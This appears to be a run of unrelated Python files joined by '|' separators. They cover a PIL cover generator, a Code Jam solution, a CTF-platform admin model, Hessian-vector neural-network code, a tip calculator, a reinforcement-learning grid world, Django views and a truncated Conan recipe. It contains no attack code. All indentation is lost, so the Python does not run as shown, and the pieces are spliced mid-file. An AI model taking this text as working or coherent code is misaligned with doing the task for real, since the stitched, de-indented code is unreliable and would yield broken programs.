iFontSize = AuthorTemplate.FontMaxSize,
iMaxRows = AuthorTemplate.MaxRows,
Color = BGProfile.AuthorNameColor)
AuthorNameSection.SetDimensions()
AuthorNameSection.DrawLines(draw, xOffset, AUTHORNAME_YOFFSET)
else:
print("ERROR. File name '" + bg.FileName + "' not found for background " + str(bg))
# Write the generator # on the top left corner of the cover
if not ImgTxtGen.ID is None:
sGenID = str(ImgTxtGen.ID).zfill(3)
ImgGenNo = Image.open(PATCH_PATH + "gen_cover_patch.jpg").convert('RGBA')
GenFont = ImageFont.truetype(FONT_PATH + "NimbusRomNo9L-MedIta.otf", size = int(round(8 * RESOLUTION)), index = 0)
draw_patch = ImageDraw.Draw(ImgGenNo)
draw_patch.text((0, 0), sGenID, font = GenFont, fill = "black")
BGImg.alpha_composite(ImgGenNo, dest=(96, 18))
return BGImg.convert("RGB") |
#!/usr/bin/python -tt
def count(m):
if m == 0:
return "INSOMNIA"
a = [False, False, False, False, False, False, False, False, False, False]
filled = 10
mmm = m
while filled > 0 and m < 10**100:
mm = m
while mm > 10:
last_dig = mm % 10
if not a[last_dig]:
a[last_dig] = True
filled -= 1
mm = mm / 10
if mm == 10:
if not a[0]:
a[0] = True
filled -= 1
if not a[1]:
a[1] = True
filled -= 1
elif not a[mm]:
a[mm] = True
filled -= 1
if filled == 0:
break
m += mmm
return m
n = int(raw_input())
for i in xrange(n):
x = int(raw_input())
print "Case #" + str(i+1) + ": " + str(count(x))
|
"""'Administrator's SQLAlchemy model"""
from flask_login import UserMixin
from sqlalchemy import ForeignKey, UniqueConstraint
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import relationship
from JDISCTF.app import DB
from JDISCTF.models.role import Role
class Administrator(UserMixin, DB.Model):
"""
Administrator model
An administrator is a person who manages events. Depending on his roles, an administrator can
create challenge, edit event info, edit event theme, etc. Administrators use a single account to
manage all events.
"""
__tablename__ = 'Administrators'
id = DB.Column(DB.Integer, primary_key=True)
"""The unique ID of the admin. Should be generated by the database. Used as primary key."""
is_platform_admin = DB.Column(DB.Boolean)
"""
Defines whether or not the administrator is a platform admin. Platform admins have complete
to all of the platform's configuration as well as all events.
"""
user_id = DB.Column(DB.Integer, ForeignKey('Users.id'), nullable=True, unique=True)
"""The ID of the event the administrator is associated with. Used as a foreign key."""
event_administrators = relationship('EventAdministrator')
events = association_proxy('event_administrators', 'event')
user = relationship('User', lazy='joined')
def is_admin_of_event(self, event_id: int) -> bool:
"""
:param event_id:
:return: True if the admin is admin for the given event.
"""
return self.is_platform_admin or event_id in map(lambda x: x.id, self.events)
def get_roles_for_event(self, event_id: int) -> [Role]:
"""
:param event_id:
:return: The list of all the roles the administrator has for the given event.
"""
event_administrators = filter(lambda x: x.event_id == event_id, self.event_administrators)
roles = map(lambda x: x.roles, event_administrators)
return set().union(*roles)
def __repr__(self):
return '<Administrator id:{} is_platform_admin:{} user_id:{}>' \
.format(self.id, self.is_platform_admin, self.user_id)
class EventAdministrator(DB.Model):
"""
EventAdministrators model. This is an association table between administrators and events.
"""
__tablename__ = 'EventAdministrators'
id = DB.Column(DB.Integer, primary_key=True)
"""The unique ID of the row. Should be generated by the database. Used as primary key."""
event_id = DB.Column(DB.Integer, ForeignKey('Events.id'), nullable=True)
"""The ID of the Event that this row associates. Used as foreign key."""
administrator_id = DB.Column(DB.Integer, ForeignKey('Administrators.id'), nullable=True)
"""The ID of the Administrator that this row associates. Used as foreign key."""
event = relationship('Event', back_populates='event_administrators', lazy='joined')
administrator = relationship('Administrator', back_populates='event_administrators', lazy='joined')
roles = relationship('RoleAssociation', back_populates='event_administrator', lazy='joined')
__table_args__ = (
UniqueConstraint('event_id', 'administrator_id', name='event_administrator_event_administrator_uc'),
)
def __repr__(self):
return '<EventAdministrator id:{} event_id:{} administrator_id:{}>' \
.format(self.id, self.event_id, self.administrator_id)
|
import numpy as np
import scipy.io
class Sigmoid(object):
def __init__(self, x):
self.x = x
def f(self):
return 1.0 / (1.0 + np.exp(-self.x))
def df(self):
f = self.f()
return np.multiply(f, 1.0-f)
def d2f(self):
f = self.f()
return np.multiply(np.multiply(f, 1.0-f), 1.0-2.0*f)
def d3f(self):
f = self.f()
return np.multiply(np.multiply(f, 1.0-f), 6.0*np.power(f, 2)-6.0*f+1.0)
class MeanSquaredError(object):
def __init__(self, yhat, y):
self.y = y
self.yhat = yhat
def f(self):
return 0.5*np.sum(np.power(self.yhat-self.y, 2))
def df(self):
return self.yhat-self.y
def d2f(self):
return 1.0
def d3f(self):
return 0.0
class ROp(object):
def __init__(self, fname):
self.mdict = scipy.io.loadmat(fname) # import dataset from matlab
self.x = self.mdict.get('x')
self.y = self.mdict.get('y')
self.w = self.mdict.get('w')
self.b = self.mdict.get('b')
self.v = self.mdict.get('v')
self.n = len(self.x)
self.len = len(self.w)
self.xhat = {}
self.yhat = {}
self.dEdy = {}
self.dEdx = {}
self.dEdw = {}
self.rx = {}
self.ry = {}
self.rdEdy = {}
self.rdEdx = {}
self.rdEdw = {}
self.r2x = {}
self.r2y = {}
self.r2dEdy = {}
self.r2dEdx = {}
self.r2dEdw = {}
def forward(self):
for i in range(0, self.len):
# compute x
if i == 0:
self.xhat[i] = np.dot(self.w[(i, 0)], self.x)+self.b[(i, 0)]
else:
self.xhat[i] = np.dot(self.w[(i, 0)], self.yhat[i-1])+self.b[(i, 0)]
# compute y
sig = Sigmoid(self.xhat[i])
self.yhat[i] = sig.f()
# compute R{x}
v = np.reshape(self.v[(i * self.n ** 2):((i + 1) * self.n ** 2)], (self.n, self.n), order='F')
if i == 0:
self.rx[i] = np.dot(v, self.x)
else:
self.rx[i] = np.dot(v, self.yhat[i-1])
self.rx[i] += np.dot(self.w[(i, 0)], self.ry[i-1])
# compute R{y}
self.ry[i] = np.multiply(self.rx[i], sig.df())
# compute R^2{x}
if i == 0:
self.r2x[i] = 0.0
else:
self.r2x[i] = np.dot(self.w[(i, 0)], self.r2y[i-1])
self.r2x[i] += 2.0*np.dot(v, self.ry[i-1])
# compute R^2{y}
self.r2y[i] = np.multiply(self.r2x[i], sig.df()) + np.multiply(np.power(self.rx[i], 2), sig.d2f())
def backward(self):
for i in range(self.len-1, -1, -1):
# check if forward pass computed
if not self.yhat:
raise Exception('Run forward pass before backward.')
# compute dE/dy
if i == (self.len-1):
err = MeanSquaredError(self.yhat[i], self.y)
self.dEdy[i] = err.df()
else:
self.dEdy[i] = np.transpose(np.dot(np.transpose(self.dEdx[i+1]), self.w[(i+1, 0)]))
# compute dE/dx
sig = Sigmoid(self.xhat[i])
self.dEdx[i] = np.multiply(sig.df(), self.dEdy[i])
# compute dE/dw
if i == 0:
self.dEdw[i] = np.outer(self.dEdx[i], self.x)
else:
self.dEdw[i] = np.outer(self.dEdx[i], self.yhat[i - 1])
# compute R{dE/dy}
if i == (self.len - 1):
self.rdEdy[i] = np.multiply(err.d2f(), self.ry[i])
else:
self.rdEdy[i] = np.transpose(np.dot(np.transpose(self.rdEdx[i+1]), self.w[(i+1, 0)]))
v = np.reshape(self.v[((i + 1) * self.n ** 2):((i + 2) * self.n ** 2)], (self.n, self.n), order='F')
self.rdEdy[i] += np.transpose(np.dot(np.transpose(self.dEdx[i+1]), v))
# compute R{dE/dx}
self.rdEdx[i] = np.multiply(sig.df(), self.rdEdy[i])
self.rdEdx[i] += np.multiply(np.multiply(self.rx[i], sig.d2f()), self.dEdy[i])
# compute R{dE/dw}
if i == 0:
self.rdEdw[i] = np.outer(self.rdEdx[i], self.x)
else:
self.rdEdw[i] = np.outer(self.rdEdx[i], self.yhat[i - 1]) + np.outer(self.dEdx[i], self.ry[i - 1])
# compute R^2{dE/dy}
if i == (self.len - 1):
self.r2dEdy[i] = np.multiply(err.d3f(), np.power(self.ry[i], 2)) + np.multiply(err.d2f(), self.r2y[i])
else:
self.r2dEdy[i] = np.transpose(np.dot(np.transpose(self.r2dEdx[i+1]), self.w[(i+1, 0)]))
self.r2dEdy[i] += 2.0*np.transpose(np.dot(np.transpose(self.rdEdx[i+1]), v))
# compute R^2{dE/dx}
self.r2dEdx[i] = 2.0 * np.multiply(np.multiply(self.rx[i], sig.d2f()), self.rdEdy[i])
self.r2dEdx[i] += np.multiply(sig.df(), self.r2dEdy[i])
self.r2dEdx[i] += np.multiply(np.multiply(self.r2x[i], sig.d2f()), self.dEdy[i])
self.r2dEdx[i] += np.multiply(np.multiply(np.power(self.rx[i], 2), sig.d3f()), self.dEdy[i])
# compute R^2{dE/dw}
if i == 0:
self.r2dEdw[i] = np.outer(self.r2dEdx[i], self.x)
else:
self.r2dEdw[i] = np.outer(self.r2dEdx[i], self.yhat[i - 1])
self.r2dEdw[i] += 2.0 * np.outer(self.rdEdx[i], self.ry[i - 1])
self.r2dEdw[i] += np.outer(self.dEdx[i], self.r2y[i - 1])
def compute(self):
self.forward()
self.backward()
def compare(self):
# check if compute performed
if not self.r2dEdw:
raise Exception('Run compute before compare.')
# reformat
vghv = []
for i in range(0, self.len):
vghv.extend(self.r2dEdw[i].flatten(order='F'))
vghvMat = self.mdict.get('vghv') # get value from mdict
vghvMat = np.reshape(vghvMat, np.shape(vghv), order='F')
if vghvMat is None:
raise Exception('vghv does not exist in Matlab data file.')
diff = vghvMat-vghv # compute difference
norm = np.linalg.norm(diff) # compute norm
return norm
def ropCompare(self):
# check if compute performed
if not self.rdEdw:
raise Exception('Run compute before compare.')
# reformat
hv = []
for i in range(0, self.len):
hv.extend(self.rdEdw[i].flatten(order='F'))
hvMat = self.mdict.get('hv') # get value from mdict
hvMat = np.reshape(hvMat, np.shape(hv), order='F')
if hvMat is None:
raise Exception('hv does not exist in Matlab data file.')
diff = hvMat-hv # compute difference
norm = np.linalg.norm(diff) # compute norm
return norm
def gradCompare(self):
# check if compute performed
if not self.rdEdw:
raise Exception('Run compute before compare.')
# reformat
g = []
for i in range(0, self.len):
g.extend(self.dEdw[i].flatten(order='F'))
gMat = self.mdict.get('g') # get value from mdict
gMat = np.reshape(gMat, np.shape(g), order='F')
if gMat is None:
raise Exception('g does not exist in Matlab data file.')
diff = gMat-g # compute difference
norm = np.linalg.norm(diff) # compute norm
return norm
|
"""
Program to calculate tip
total amount is the addition of total bill and amount of the tip that needs to be given
tip is calculated by multiplying total bill with tip percentage and dividing by 100
each person expense is total amount divided by total number of people and round the expense upto two decimal points
"""
print("Welcome to the tip calculator")
total_bill = float(input("What was the total bill? $"))
tip_percentage = float(input("What percentage tip would you like to give? 10, 12, or 15? "))
total_people = int(input("How many people to split the bill? "))
total_amount = total_bill + (total_bill * tip_percentage/100)
each_person_amount = round(total_amount / total_people, 2)
print(f"Each person should pay: ${each_person_amount}")
|
import csv
import numpy as np
x1 = []
x2 = []
x = []
with open('Data/Output/Data1.csv') as csvfile1:
read_position = csv.reader(csvfile1, delimiter = ',')
for row in read_position:
x1.append(row)
with open('Data/Output/Data2.csv') as csvfile2:
read_position = csv.reader(csvfile2, delimiter = ',')
for row in read_position:
x2.append(row)
for k in range((len(x1[0]) - 2)//4):
y = []
for i in range(len(x1)):
distance = np.sqrt((float(x1[i][4*k]) - float(x2[i][4*k]))**2 + (float(x1[i][(4*k)+1]) - float(x2[i][(4*k)+1]))**2 + (float(x1[i][(4*k)+2]) - float(x2[i][(4*k)+2]))**2)
y.append([x1[i][-2],distance])
x.append(y)
from matplotlib import pyplot as plt
fig = plt.figure()
ax1 = fig.add_subplot(111)
for i in range(len(x)):
dist = []
time = []
for data in x[i]:
dist.append(data[1])
time.append(float(data[0]))
line, = ax1.plot(time,dist)
line.set_label("Particle " + str(i+1))
ax1.set_xlabel("Time")
ax1.set_ylabel("Distance ")
ax1.set_title("Distance Between Particles Simulated With and Without Adaptive Time-Stepping\nUsing Leap Frogging")
ax1.legend()
plt.show()
|
__version__ = "$Id$"
# Clipboard module.
#
# There is one *global* clipboard object, but it is implemented as a class,
# so you can create multiple instances if you wish.
#
# Unfortunately, there is no link with the X clipboard facility (yet).
#
# The clipboard node typed: you always specify a list of objects.
# the type of object is known with the 'getClassName' method
# Standard type we currently support
#
# type
#
# 'MMNode' MM subtree (must not have a parent)
# 'Region' MMChannel instance
# 'Viewport' MMChannel instance representing a topLayout
# 'RegionAssociation' MMRegionAssociation instance (LayoutView only)
# 'Properties' MMAttrContainer instance
#
# To implement Cut/Copy/Paste (example with single selection)
#
# 'Cut': use x.Extract() to remove the node from its tree,
# then call setclip([x])
# 'Copy': use y = x.DeepCopy() to make a copy of the tree,
# then call setclip([y])
# 'Paste': insert the actual contents from the clipboard in the tree,
# then *copy* it back to the clipboard:
# list = getclip(); x=[list]; setclip(type, [x.DeepCopy()])
from Owner import *
class Clipboard:
def __init__(self):
self.__data = []
def __repr__(self):
return '<Clipboard instance, type=' + `self.type` + '>'
def setclip(self, data):
if not type(data) in (type(()), type([])):
print 'Clipboard.setclip : data is not a list ',data
return
for node in self.__data:
node.removeOwner(OWNER_CLIPBOARD)
for node in data:
node.addOwner(OWNER_CLIPBOARD)
self.__data = data
def getclip(self):
return self.__data
def getclipcopy(self):
data = self.getclip()
new_data = []
for node in data:
if hasattr(node, 'getClassName'):
if hasattr(node, 'DeepCopy'):
# We return the old one and put the new one on the clipboard
new_data.append(node.DeepCopy())
else:
# Don't have DeepCopy method. So we guess we don't need to copy
# the object in this case
new_data.append(node)
self.restoreclip(new_data)
return data
def clearclip(self):
Clipboard.setclip(self, [])
|
import pytest
from .pages.pages import MapPage, LandingPage, ListPage
from .base import FunctionalTestCase
@pytest.mark.usefixtures('activity_changeset')
class ListTests(FunctionalTestCase):
def test_list_filter(self):
# Test that the list can be filtered by attributes.
a_id_1 = self.create_item(
item_type='activity', user=self.user_editor1,
changeset=self.activity_changeset(
'simple',
intention='Agriculture'
), status='active'
)
a_id_2 = self.create_item(
item_type='activity', user=self.user_editor1,
changeset=self.activity_changeset(
'simple',
intention='Agriculture',
intended_area=123.5
), status='active'
)
a_id_3 = self.create_item(
item_type='activity', user=self.user_editor1,
changeset=self.activity_changeset(
'simple',
intention='Mining',
intended_area=50
), status='active'
)
# Start from the landing page to correctly set the location cookie.
# landing_page = LandingPage(self.driver)
# self.get_page(landing_page)
# landing_page.click_entry_button()
map_page = MapPage(self.driver)
list_page = ListPage(self.driver)
# On the list page, there are 3 results
map_page.click_menu_list()
list_page.check_entries(expected=[
{
'identifier': a_id_3
},
{
'identifier': a_id_2
},
{
'identifier': a_id_1
}
])
# Add a first filter
list_page.add_filter('Intention of Investment', 'Agriculture')
# Only 2 entries remain in the list
list_page.check_entries(expected=[
{
'identifier': a_id_2
},
{
'identifier': a_id_1
}
])
# Filters can also be added on the map page
list_page.click_menu_map()
map_page.add_filter(
'Intended area (ha)', '100', is_text=True, operator='>')
# Back on the list page, only 1 result remains
map_page.click_menu_list()
list_page.check_entries(expected=[
{
'identifier': a_id_2
}
])
def test_list_is_filtered_spatially(self):
# Test that the list is filtered spatially by the extent currently
# visible on the map.
a_id_1 = self.create_item(
item_type='activity', user=self.user_editor1,
changeset=self.activity_changeset('simple'), status='active'
)
a_id_2 = self.create_item(
item_type='activity', user=self.user_editor1,
changeset=self.activity_changeset(
'simple', coordinates=[96.98, 26.25]),
status='active'
)
# Start from the landing page to correctly set the location cookie.
landing_page = LandingPage(self.driver)
self.get_page(landing_page)
landing_page.click_entry_button()
# For the initial zoom level, there are 2 activities on the map, which
# are also available in the list view.
map_page = MapPage(self.driver)
map_page.click_menu_list()
list_page = ListPage(self.driver)
list_page.check_entries(expected=[
{
'identifier': a_id_2,
},
{
'identifier': a_id_1,
}
])
# Back on the map, when zooming in, only 1 activity remains. Also on the
# list, there is now only 1 entry.
list_page.click_menu_map()
for _ in range(5):
map_page.zoom_in()
map_page.click_menu_list()
list_page.check_entries(expected=[
{
'identifier': a_id_1,
}
])
# The current map extent is stored in a cookie. Therefore going to the
# map and back to the list should return the same spatially filtered
# list as before.
list_page.click_menu_map()
map_page.click_menu_list()
list_page.check_entries(expected=[
{
'identifier': a_id_1,
}
])
# There is a button to filter by the extent of the profile. Clicking on
# this brings all results back on the list.
list_page.click_filter_by_profile()
list_page.check_entries(expected=[
{
'identifier': a_id_2,
},
{
'identifier': a_id_1,
}
])
|
import numpy as np
import lasagne
from lasagne.updates import sgd
from gmllib.helpers import progress_bar
from rllib.environment import Environment
from rllib.agent import Agent
from rllib.space import FiniteStateSpace, FiniteActionSpace
from rllib.parameter_schedule import GreedyEpsilonLinearSchedule
from rllib.q_learning import QLearningAgent, QTableLookup, QNeuralNetwork
from rllib.rl import calculate_optimal_q_dp
from rllib.policy_gradient import PolicyGradientAgent, PolicyNeuralNetworkMultinomial
class SimpleGridWorldStateSpace(FiniteStateSpace):
def __init__(self):
states = []
for i in range(4):
for j in range(3):
states.append((i, j))
FiniteStateSpace.__init__(self, states)
def is_goal_state(self, state):
if state in [(3, 1), (3, 2)]:
return True
return False
def get_reward(self, state):
if state == (3, 2):
return 1.0
elif state == (3, 1):
return -1.0
elif state == (1, 1):
return 0.0
else:
return -0.04
def get_initial_state(self):
return 0, 0
class SimpleGridWorldActionSpace(FiniteActionSpace):
def __init__(self):
FiniteActionSpace.__init__(self, actions=['L', 'R', 'U', 'D'])
class SimpleGridWorldEnvironment(Environment):
def __init__(self):
"""
This is the example grid world discussed in Chapter 21 of Artificial Intelligence: A Modern Approach
"""
Environment.__init__(self, state_space=SimpleGridWorldStateSpace())
self.action_steps = {'L': (-1, 0), 'R': (1, 0), 'U': (0, 1), 'D': (0, -1)}
self.relative_actions = {('L', 'L'): 'D', ('L', 'R'): 'U', ('R', 'L'): 'U', ('R', 'R'): 'D',
('U', 'L'): 'L', ('U', 'R'): 'R', ('D', 'L'): 'R', ('D', 'R'): 'L'}
self.x_width = 4
self.y_width = 3
def _advance(self, action=None):
if np.random.rand() > 0.8:
err = np.random.choice(['L', 'R'])
action = self.relative_actions[(action, err)]
step = self.action_steps[action]
new_state = (self.current_state[0] + step[0], self.current_state[1] + step[1])
if self._state_out_of_bounds(new_state):
new_state = self.current_state
return new_state
def _state_out_of_bounds(self, state):
if state[0] < 0 or state[0] >= self.x_width or state[1] < 0 or state[1] >= self.y_width or state == (1, 1):
return True
return False
def _add_next_state(self, next_states, state_probabilities, state, new_state, prob):
if self._state_out_of_bounds(new_state):
if state in next_states:
s_id = next_states.index(state)
state_probabilities[s_id] += prob
else:
next_states.append(state)
state_probabilities.append(prob)
else:
next_states.append(new_state)
state_probabilities.append(prob)
def get_next_states(self, state, action):
if state in [(1, 1), (3, 2), (3, 1)]:
return self.state_space.get_reward(state), [], np.array([])
reward = self.state_space.get_reward(state)
next_states = []
state_probabilities = []
# no err
step = self.action_steps[action]
new_state = (state[0] + step[0], state[1] + step[1])
self._add_next_state(next_states, state_probabilities, state, new_state, 0.8)
# err left
step = self.action_steps[self.relative_actions[(action, 'L')]]
new_state = (state[0] + step[0], state[1] + step[1])
self._add_next_state(next_states, state_probabilities, state, new_state, 0.1)
# err right
step = self.action_steps[self.relative_actions[(action, 'R')]]
new_state = (state[0] + step[0], state[1] + step[1])
self._add_next_state(next_states, state_probabilities, state, new_state, 0.1)
return reward, next_states, np.array(state_probabilities)
class SimpleGridWorldAgent(Agent):
def __init__(self):
Agent.__init__(self, action_space=SimpleGridWorldActionSpace())
def reset(self):
pass
def get_action(self, state, available_actions=None):
return np.random.choice(self.action_space)
def perceive(self, new_state, reward, available_actions, reached_goal_state=False, episode_end=False):
return self.get_action(new_state)
if __name__ == "__main__":
env = SimpleGridWorldEnvironment()
action_space = SimpleGridWorldActionSpace()
q_opt = calculate_optimal_q_dp(env, action_space, discount_factor=1.0, eps=1e-9)
print q_opt
epoch_count = 20
episodes_per_epoch = 5000
eps_schedule = GreedyEpsilonLinearSchedule(start_eps=1.0, end_eps=0.1, no_episodes=epoch_count*episodes_per_epoch,
decrease_period=episodes_per_epoch)
rewards = np.zeros(epoch_count)
# q-learning
# q_function = QTableLookup(env.state_space, action_space, learning_rate=0.05)
q_function = QNeuralNetwork([], env.state_space, action_space, learning_rate=0.01)
q_learner = QLearningAgent(q_function, discount_factor=1.0, greed_eps=eps_schedule)
for e in range(epoch_count):
for i in range(episodes_per_epoch):
progress_bar(i+1, max=episodes_per_epoch, update_freq=episodes_per_epoch/100)
s, a, r = env.run(q_learner, np.inf)
rewards[e] += np.sum(r)
rewards[e] /= episodes_per_epoch
print("Epoch {0:d}| Avg. reward per episode: {1:f}".format(e+1, rewards[e]))
q_learner.set_learning_mode(False)
reward = 0.0
for i in range(1000):
s, a, r = env.run(q_learner, np.inf)
reward += np.sum(r)
print("Avg. reward with greedy policy: {0:f}".format(reward/1000))
for state in env.state_space:
print q_function.get_q(state)
# policy gradient
input_dim = env.state_space.to_vector(env.state_space.get_initial_state()).shape
nn = lasagne.layers.InputLayer(shape=(1,) + input_dim)
nn = lasagne.layers.DenseLayer(incoming=nn, num_units=len(action_space), W=lasagne.init.Normal(0.01), b=None,
nonlinearity=lasagne.nonlinearities.softmax)
policy_function = PolicyNeuralNetworkMultinomial(nn, env.state_space, action_space, learning_rate=0.001,
optimizer=sgd)
pg_learner = PolicyGradientAgent(policy_function, discount_factor=1.0, update_freq=1000)
for e in range(epoch_count):
for i in range(episodes_per_epoch):
progress_bar(i+1, max=episodes_per_epoch, update_freq=episodes_per_epoch/100)
s, a, r = env.run(pg_learner, np.inf)
rewards[e] += np.sum(r)
rewards[e] /= episodes_per_epoch
print("Epoch {0:d}| Avg. reward per episode: {1:f}".format(e+1, rewards[e]))
pg_learner.set_learning_mode(False)
reward = 0.0
for i in range(1000):
s, a, r = env.run(pg_learner, np.inf)
reward += np.sum(r)
print("Avg. reward with learned policy: {0:f}".format(reward/1000))
for s in env.state_space:
print policy_function._forward(env.state_space.to_vector(s)[np.newaxis, :])
|
#!/usr/bin/env python2
import sys
grafo = open(sys.argv[1], 'w+')
grafo.write('digraph {\n')
temp = dict()
for line in sys.stdin:
values = line.strip().split()
if values[0] == 'eth':
key = values[1]+'-'+values[2]
if int(values[3]) == 34525:
key = key+'-'+'IPv6'
if not key in temp.keys():
temp[key] = 0
if int(values[3]) == 2054:
key = key+'-'+'ARP'
if not key in temp.keys():
temp[key] = 0
if int(values[3]) == 2048:
key = key+'-'+'IPv4'
if not key in temp.keys():
temp[key] = 0
for key, value in temp.items():
values = key.split('-')
grafo.write('\"' + values[0] + '\"' + ' -> ' + '\"' + values[1] + '\"' + '[label=' + values[2] + '];\n')
grafo.write('}\n')
grafo.close()
|
from django.core.exceptions import ValidationError
from rest_framework import viewsets, status, permissions
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework_extensions.mixins import NestedViewSetMixin
from apps.recipes.models import Recipe, Step
from apps.recipes.serializers import StepSerializer
class StepViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
"""
Allows recipe steps to be viewed or edited.
"""
queryset = Step.objects.all()
serializer_class = StepSerializer
permission_classes = [permissions.IsAuthenticated]
def list(self, request, *args, **kwargs):
recipe = Recipe.objects.get(pk=kwargs['parent_lookup_recipe_id'])
if not recipe:
return Response(status=status.HTTP_404_NOT_FOUND)
queryset = recipe.steps.all().order_by('order')
return Response(status=status.HTTP_200_OK, data=StepSerializer(queryset, many=True).data)
def create(self, request, *args, **kwargs):
recipe = Recipe.objects.get(pk=kwargs['parent_lookup_recipe_id'])
if not recipe:
return Response(status=status.HTTP_404_NOT_FOUND)
step = Step(text=request.data['text'], order=recipe.steps.count(), recipe_id=recipe.pk)
step.save()
try:
recipe.move_step(step, request.data['order'])
except KeyError as err:
pass
return Response(status=status.HTTP_201_CREATED, data=StepSerializer(step).data)
def destroy(self, request, *args, **kwargs):
recipe = Recipe.objects.get(pk=kwargs['parent_lookup_recipe_id'])
if not recipe:
return Response(status=status.HTTP_404_NOT_FOUND)
step = self.get_object()
step.delete()
recipe.reorder_steps()
return Response(status=status.HTTP_204_NO_CONTENT)
@action(methods=['put'], detail=True, url_path='move', url_name='recipe-steps_move')
def move(self, request, pk=None, *args, **kwargs):
"""
Move a step.
"""
recipe = Recipe.objects.get(pk=kwargs['parent_lookup_recipe_id'])
if not recipe:
return Response(status=status.HTTP_404_NOT_FOUND)
step = self.get_object()
if not step:
return Response(status=status.HTTP_404_NOT_FOUND)
try:
recipe.move_step(step, request.data['order'])
except Step.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
except IndexError as err:
return Response(status=status.HTTP_400_BAD_REQUEST, data=str(err))
return Response(status=status.HTTP_200_OK)
|
# coding: utf8
from django.shortcuts import get_object_or_404, redirect
from django.views.generic.list import ListView
from django.views.generic.base import View
from django.views.generic.edit import DeleteView, CreateView, UpdateView
from braces.views import LoginRequiredMixin, JSONResponseMixin
from forum.models import Blog, Comment
from django.core import exceptions
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_POST
from django.contrib import messages
from django import forms
class BlogView(ListView):
template_name = 'blogs/show.html'
http_method_names = ['get']
model = Blog
paginate_by = 20
def get(self, request, *args, **kwargs):
id = self.kwargs.get('id')
self.blog = get_object_or_404(Blog, pk=id)
return super(BlogView, self).get(request, *args, **kwargs)
def get_queryset(self):
return self.blog.comment_set.all()
def get_context_data(self, **kwargs):
self.blog.hit()
if self.request.user.is_authenticated():
self.request.user.clear_notifications_with_blog(self.blog)
ctx = super(BlogView,self).get_context_data(**kwargs)
ctx['blog'] = self.blog
ctx['request'] = self.request
return ctx
class BlogListView(ListView):
template_name = 'blogs/list.html'
http_method_names = ['get']
model = Blog
paginate_by = 20
def get_queryset(self):
return Blog.objects.order_by('-id')
def get_context_data(self, **kwargs):
ctx = super(BlogListView, self).get_context_data(**kwargs)
ctx['tab'] = 'blog'
return ctx
@require_POST
@login_required
def comment(request, id):
b = get_object_or_404(Blog, pk=id)
content = request.POST.get('content', '').strip()
if not content:
messages.error(request, '评论不能为空')
return redirect(b)
messages.success(request, '评论成功')
b.new_comment(content=content, author=request.user)
return redirect(b)
class StickView(View, LoginRequiredMixin, JSONResponseMixin):
http_method_names = ['post']
def post(self, request, id):
if not request.user.is_superuser:
return self.render_json_response('permission denied', 403)
t = get_object_or_404(Blog, pk=id)
t.stick()
return self.render_json_response({
'status': 'ok'
})
class UnstickView(View, LoginRequiredMixin, JSONResponseMixin):
http_method_names = ['post']
def post(self, request, id):
if not request.user.is_superuser:
return self.render_json_response('permission denied', 403)
t = get_object_or_404(Blog, pk=id)
t.unstick()
return self.render_json_response({
'status': 'ok'
})
class DeleteCommentView(LoginRequiredMixin, DeleteView):
template_name = 'common/delete.html'
def get_object(self, queryset=None):
comment_id = self.request.GET.get('delete_comment_id')
comment = get_object_or_404(Comment, pk=comment_id)
if comment.author != self.request.user and not self.request.user.is_superuser:
raise exceptions.PermissionDenied
return comment
def get_success_url(self):
return self.object.blog.get_absolute_url()
class BlogForm(forms.ModelForm):
title = forms.CharField(initial='', error_messages={
'required': '主题不能为空',
})
content = forms.CharField(initial='', widget=forms.Textarea(), error_messages={
'required': '正文不能为空'
})
cover = forms.ImageField(error_messages={
'required': '封面不能为空'
})
class Meta:
model = Blog
fields = ['title', 'content', 'cover']
class NewBlogView(LoginRequiredMixin, CreateView):
template_name = 'blogs/new.html'
model = Blog
form_class = BlogForm
def form_valid(self, form):
form.instance.author = self.request.user
messages.success(self.request, '主题创建成功')
return super(NewBlogView, self).form_valid(form)
class UpdateBlogView(LoginRequiredMixin, UpdateView):
template_name = 'blogs/edit.html'
model = Blog
form_class = BlogForm
def form_valid(self, form):
messages.success(self.request, '主题修改成功')
return super(UpdateView, self).form_valid(form)
def get_object(self, queryset=None):
blog = get_object_or_404(Blog, pk=self.kwargs['id'])
if blog.author != self.request.user and not self.request.user.is_superuser:
raise exceptions.PermissionDenied
return blog
class DeleteBlogView(LoginRequiredMixin, DeleteView):
template_name = 'common/delete.html'
success_url = reverse_lazy('index')
def get_object(self, queryset=None):
topic = get_object_or_404(Blog, pk=self.kwargs['id'])
if topic.author != self.request.user and not self.request.user.is_superuser:
raise exceptions.PermissionDenied
return topic |
from conans import ConanFile, tools, CMake
from conans.errors import ConanInvalidConfiguration, ConanException
import os
class Sol2Conan(ConanFile):
name = "sol2"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/ThePhD/sol2"
description = "C++17 Lua bindings"
topics = ("conan", "lua", "c++", "bindings")
settings = "os", "compiler", "build_type", "arch"
license = "MIT"
requires = ["lua/5.3.5"]
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
_cmake = None
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.configure(
source_folder=self._source_subfolder,
build_folder=self._build_subfolder
)
return self._cmake
def configure(self):
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, "14")
compiler = str(self.settings.compiler)
comp_version = tools.Version(self.settings.compiler.version)
compilers = {"Visual Studio": "14", "gcc": "5",
"clang": "3.2", "apple-clang": "4.3"}
min_version = compilers.get(compiler)
if not min_version:
self.output.warn(
"sol2 recipe lacks information about the %s compiler support".format(compiler))
elif comp_version < min_version:
raise ConanInvalidConfiguration("sol2 requires C++14 or higher support standard."
" {} {} is not supported."
.format(compiler, comp_version))
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("LICENSE.txt", src=self._source_subfolder, dst="licenses")
cmake = self._configure_cmake()
cmake.install()
# constains just # , "pkgconfig"))
tools.rmdir(os.path.join(self.package_folder, "share"))
# constains just # , "cmake"))
tools.rmdir(os.path.join(self.package_folder, "lib"))
def package_id(self):
self.info.header_only()
def package_info(self):
if self.options["lua"].compile_as_cpp:
